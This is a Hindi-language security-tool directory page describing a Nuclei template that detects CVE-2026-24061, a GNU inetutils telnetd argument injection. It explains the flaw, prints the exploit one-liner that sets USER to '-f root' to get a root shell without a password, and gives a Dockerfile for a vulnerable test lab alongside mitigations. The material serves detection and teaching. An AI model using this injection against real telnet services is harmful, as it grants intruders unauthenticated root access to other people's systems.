Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — # CVE-2026-24061 का पता लगाने के लिए Nuclei टेम्पलेट, GNU inetutils telnetd में एक गंभीर telnet आर्गुमेंट इंजेक्शन जो बिना प्रमाणीकरण के रूट एक्सेस की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/mr-zapi/cve-2026-24061
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

# CVE-2026-24061 का पता लगाने के लिए Nuclei टेम्पलेट, GNU inetutils telnetd में एक गंभीर telnet आर्गुमेंट इंजेक्शन जो बिना प्रमाणीकरण के रूट एक्सेस की अनुमति देता है।

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061 - Telnet Argument Injection

Nuclei टेम्पलेट GNU inetutils telnetd में CVE-2026-24061 भेद्यता का पता लगाने के लिए, जो बिना प्रमाणीकरण के root एक्सेस प्राप्त करने की अनुमति देता है।

📋 भेद्यता का विवरण

CVE-2026-24061 GNU inetutils telnetd में एक गंभीर argument injection भेद्यता है, जो हमलावर को पासवर्ड जाने बिना root shell प्राप्त करने की अनुमति देती है।

यह कैसे काम करता है?

  1. समस्या की जड़: 2015 में telnetd में डायनामिक पैरामीटर %U के साथ एक नया लॉगिन टेम्पलेट जोड़ा गया था:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. भेद्यता: पर्यावरण चर USER telnet प्रोटोकॉल (RFC 1572 NEW-ENVIRON) के माध्यम से पारित किया जाता है और कमांड में प्रतिस्थापित करने से पहले सैनिटाइज़ नहीं किया जाता।

  2. शोषण: हमलावर कनेक्ट करते समय USER="-f root" सेट करता है:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. परिणाम: लॉगिन कमांड बन जाता है:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

फ्लैग -f का अर्थ है "skip authentication" → बिना पासवर्ड root 💀

🎯 प्रभावित संस्करण

  • उपयुक्त लॉगिन टेम्पलेट वाला GNU inetutils telnetd
  • उदाहरण के लिए: inetutils-telnetd 2:2.0-1+deb11u2
  • वे सिस्टम जहाँ telnetd Kerberos के बिना ऑटोलॉगिन का उपयोग करता है

🚀 उपयोग

बेसिक स्कैनिंग

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

कई लक्ष्य

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 परीक्षण प्रयोगशाला

परीक्षण के लिए एक उपयुक्त Docker कंटेनर बनाया जा सकता है:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

चलाना:

root@kitploit:~
# इमेज बनाएं
docker build -t vuln-telnetd .

# चलाएं
docker run -d -p 2323:23 vuln-telnetd

# भेद्यता जांचें
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ सुरक्षा

  1. inetutils को सही संस्करण में अपडेट करें
  2. telnetd को बंद करें और SSH का उपयोग करें
  3. फ़ायरवॉल पर पोर्ट 23 को फ़िल्टर करें
  4. telnet कनेक्शन की निगरानी करें

📚 लिंक

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 CVSS स्कोर

9.8 / 10 - Critical

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Network (नेटवर्क से हमला)
  • AC:L - Low complexity (शोषण करना आसान)
  • PR:N - No privileges required (प्रमाणीकरण की आवश्यकता नहीं)
  • UI:N - No user interaction (स्वचालित शोषण)
  • C:H/I:H/A:H - गोपनीयता, अखंडता और उपलब्धता पर उच्च प्रभाव

⚠️ अस्वीकरण

यह उपकरण केवल कानूनी सुरक्षा परीक्षण के लिए है, उन सिस्टमों पर जिनके लिए आपके पास स्पष्ट अनुमति है।

लेखक इस टेम्पलेट के दुरुपयोग के लिए ज़िम्मेदार नहीं है।

👤 लेखक

Created by Mr.Zapi

टूल डाउनलोड करें